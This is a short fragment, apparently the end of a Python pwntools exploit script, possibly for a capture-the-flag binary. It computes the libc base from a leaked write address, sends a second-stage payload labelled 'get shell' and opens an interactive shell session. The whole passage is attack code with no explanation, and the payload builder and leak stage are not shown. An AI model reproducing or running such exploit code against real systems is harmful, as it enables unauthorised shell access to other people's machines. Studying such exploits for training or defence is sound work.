    libc_base = leak - libc.symbols['write']
    log.info(f"Leaked write@GLIBC: {hex(leak)}")
    log.info(f"Calculated libc base: {hex(libc_base)}")
    
    # Second stage: get shell
    final_payload = build_final_payload(libc_base, libc)
    p.sendline(final_payload)
    p.interactive()

if __name__ == "__main__":
    main()